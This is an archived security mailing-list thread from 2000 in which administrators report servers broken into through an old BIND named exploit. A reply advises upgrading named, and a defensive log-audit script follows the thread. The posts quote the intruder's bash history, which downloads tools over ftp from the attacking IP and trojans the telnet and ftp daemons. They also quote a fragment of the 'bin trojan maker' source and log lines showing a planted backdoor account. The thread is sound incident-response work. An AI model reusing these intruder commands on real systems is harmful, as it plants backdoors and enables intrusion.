Security Incidents mailing list archives
Re: succesful crack
From: rgupta () INTERLYNX NET (R. Gupta)
Date: Thu, 17 Feb 2000 16:14:44 -0500
Hello,

I was also "hacked" from the same originating IP as the intruder on your system [24.11.98.152 (c505000-a.blfld1.ct.home.com)]. I had been running Redhat 6.1. I noticed the intruder added some accounts such as username "own", and ftp'd to his IP [24.11.98.152] and downloaded fun2.c, and compiled this. Upon further investigation, all the named configuration files and binary were removed from my system. I suspect the intruder had no idea how to apply any sort of patch, so decided to kill the process and delete the files so nobody could do the same he did.

-RGUPTA

----- Original Message -----
From: "Gene Harris" <zeus () TETRONSOFTWARE COM>
To: <INCIDENTS () SECURITYFOCUS COM>
Sent: Wednesday, February 16, 2000 9:00 AM
Subject: Re: succesful crack

On Tue, 15 Feb 2000, Bob Lockie wrote:
rjlockie () home net (613) 765-5409

My box (24.112.89.219) was cracked. The attack originated from 24.11.98.152
(c505000-a.blfld1.ct.home.com).
It could be this machine was also cracked and it was used as a
launching point.
Please contact the owner and have a talk with them. The owner should definitely not offer anonymous ftp service.

A few things were left on my system.

drwxr-xr-x 2 root root 1024 Feb 13 22:03 ADMROCKS

I have no /etc/hosts.allow or /etc/hosts.deny files anymore.

This was in /tmp/,bash_history.

ftp 24.11.98.152
tar -xvf btm.tar
make
./btm /usr/sbin/in.telnetd
./btm /usr/sbin/in.ftpd
rm -rf btm.tar

The following source:

/* bin trojan maker */
#include "btm.h"
#define BTM_VER "btm v1.5"
int options=0;

void usage(char* progname)
{
  printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u compiler]"
         " [-o compiler options] target [trojan source]\n",progname);
  printf("in trojan source, the trojan function must be:\n");
  printf(" "TROJAN_FCT"(char** argv,char** envp)\n");
  printf("\n");
  printf("-d: debug mode\n");
  printf("-c: don't trojan, just put the C file on stdout\n");
  printf("-l max: max number of char in a line of the C file\n");
  printf("-v: display version\n");
  printf("-u compiler: use this compiler\n");
  printf("-o options: options for compiler\n");
  printf("-n: no save for target file\n");
  printf("-e: echo commands\n");
  printf("-m comments: put comments in btmized file\n");
  printf("\n");
  exit(0);
}

int getdirname(char* dirname,char* filename,size_t dirname_size)
{
  if (!filename) return -1;
  if (filename[0]=='/') {
    strncpy(dirname,filename,dirname_size);
    *(((char*)strrchr(dirname,'/'))+1)=0;
  } else {
    if (!getcwd(dirname,dirname_size)) {
      perror("getcwd");
      return -1;
    }
  }
  return 0;
}

/var/log/secure

Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0)
Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5000)

Bob Lockie
bjlockie () nortelnetworks com
Live long and prosper.

You've been the victim of a named daemon exploit. The ADM attack is effective against older versions of named. There have been discussions of ADMROCKS and the named exploit in this newsgroup in the last several weeks. Upgrade named to 8.2.2-P3 at a minimum. If you are running RedHat 6.1, they have had an advisory out to upgrade bind (named) for quite some time. Please check their support site -> errata -> security.

Good Luck,
Gene
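The /var/log/secure lines quoted in the thread (a login as "tek", then su to the newly added "own") are the kind of trail a quick audit can pull out of a PAM_pwdb log. The following is an added example, not code from anyone in this thread: it parses that line format and flags any session opened for, or by, an account missing from a baseline account list (the baseline and the benign sample line are constructed for the example).

```python
import re
from dataclasses import dataclass

# Matches the PAM_pwdb "session opened" lines quoted from /var/log/secure, e.g.
#   Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5000)
SESSION_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) PAM_pwdb\[(?P<pid>\d+)\]: "
    r"\((?P<service>\w+)\) session opened for user (?P<user>\S+) by (?P<by>\S*)\(uid=(?P<uid>\d+)\)$"
)

@dataclass
class Finding:
    ts: str
    service: str
    user: str
    by: str
    reason: str

def audit_secure_log(lines, known_users):
    """Return a Finding for every session line whose target or originating
    account is not in the baseline set (accounts an intruder added show up here)."""
    findings = []
    for line in lines:
        m = SESSION_RE.match(line.strip())
        if not m:
            continue  # not a session-open line; ignored
        user, by, service = m["user"], m["by"], m["service"]
        if user not in known_users:
            findings.append(Finding(m["ts"], service, user, by,
                                    "session opened for account not in baseline"))
        elif by and by not in known_users:
            findings.append(Finding(m["ts"], service, user, by,
                                    "session started by account not in baseline"))
    return findings

# Constructed sample: a benign login plus the two lines quoted in the post.
SAMPLE_LOG = [
    "Feb 14 00:58:10 gw PAM_pwdb[6801]: (login) session opened for user bob by (uid=0)",
    "Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek by (uid=0)",
    "Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by tek(uid=5000)",
]
# Constructed baseline; in practice take it from a backup of /etc/passwd or the install records.
KNOWN_USERS = {"root", "bob"}

if __name__ == "__main__":
    for f in audit_secure_log(SAMPLE_LOG, KNOWN_USERS):
        print(f"{f.ts} {f.service:5} {f.by or '-':>6} -> {f.user:6} {f.reason}")
```

Compare the flagged accounts against /etc/passwd on the box; an account that the log shows in use but nobody remembers creating is the same signal the poster saw with "own".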